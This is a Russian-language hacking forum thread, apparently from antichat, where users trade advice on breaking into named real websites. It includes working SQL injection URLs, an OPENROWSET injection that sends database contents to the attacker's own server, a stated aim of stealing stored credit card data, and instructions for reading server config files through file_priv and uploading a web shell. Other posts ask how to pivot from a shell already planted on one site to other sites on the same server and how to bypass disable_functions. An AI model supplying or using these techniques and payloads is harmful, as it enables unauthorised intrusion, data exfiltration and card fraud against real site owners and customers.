Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?
Это MSSQL!!! http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- https://forum.antichat.ru/thread30501.html
http://www.donland.ru/news.asp?Id=1+or+1=(select+top+1+author+from+ssf_forums)-- Выводит какую-то абракадабру. Вот все таблицы, которые присутствуют на сервере: ). dtproperties','ssgb2_groups','ssgb2_messages'%20,'ssgb2_messageGroups'%20,'ssgb3_groups'%20,'ssbx_banners'%20,'ssbx_clickLogs'%20,'ssf_forums','ssf_forumGroups'%20,'ssbx_showLogs','ssf_groups','ssf_messages','ssgb0_groups','ssgb0_messageGroups','ssgb0_messages','ssgb1_groups','ssgb1_messageGroups','ssgb1_messages','ssgb3_messageGroups','ssgb3_messages'%20,'ssis_nodes','ssm_groups','ssm_mailGroups','ssm_mails','ssn_newGroups','ssn_news','ssv_answers','ssv_groups','ssv_voteGroups','ssv_votes','sysconstraints','syssegments'. Есть папка admin,в которую нипонятно, что вводить))))).Сомневаюсь, что в какой-то из этих папок есть что-то вроде админ или юзер ))\ Имя выводится как 'Âñå1',и чтойта ? )
Здравствуйте! Нашёл mssql-иньекцию в одном интернет-магазинчике. Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки: ;insert+into+openrowset('sqloledb','uid=user3000;pwd=pass3000;network=DBMSSOCN;Address=777.777.103.4','select+line+from+base3000..tbltest')+select+table_name+from+information_schema.tables;-- Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны. В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице. При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp. Есть базы данных с именем cybersales. Думаю карты там. Запрос select+table_name+from+cybersales.information_schema.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы. Видимо у текущего пользователя нет прав на просморт бд cybersales. Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser. Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер. Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? ) Вот так не бывает: "cybersales.information_schema.tables" information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. )) Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+ Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации). Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)
почитай вот эти статьи, найдешь много полезно про XSS: https://forum.antichat.ru/showthread.php?t=11807 https://forum.antichat.ru/showthread.php?t=44125 https://forum.antichat.ru/showthread.php?t=42951
привет всем! что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/* ну или место юзер датабэйс и.т.д. просто появляется чистый экран.
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????
У тебя рутовый пользователь Code: POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+cp1251)+from+mysql.user/* HTTP/1.0 и есть file_priv=Y, значит можешь читать\писать файлы Code: POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+using+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0 Причем маджик_квотс_гпс отключены. Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме
немного поправлю, точное название httpd.conf или vhosts.conf кстати наличие magic quotes становится для меня во многих случаях не актуально https://forum.antichat.ru/showpost.php?p=663815&postcount=39
disable_function: Local Value. system,exec,shell_exec,passthru,popen Master Value system,exec,shell_exec,passthru,popen Дальше как?
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* Знаю что надо найти *.conf чтоб увидеть полный путь.... Помогите....не получается...
Такая трабла - недавно нашел скулю на крупном сайте, начал селектить юзеров из таблицы, но вместо пассов - шифр, явно base64, но расшифровка этого шифра вернула совсем непохожую на пасс строку, думал что хеш, вроде MD5(Base64) но количество символов у разных юзеров меняется, никто не знает, что это за хеш или шифр ? Examples: VzsGbVZoDDBValUkCCYNdw== BWcHdAEjVChRMQQz UWJXZwBnV25XOwUzCmM= p.s. Ershik Хм, вообще то еще Constantine указал на траблу с кодировкой - Хэши - MySQL v5.x
На100ящий дефолтные пути к конфигам тут: https://forum.antichat.ru/thread49775.html пишешь скриптик или руками через file_priv, далее по накатанной как я написал
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??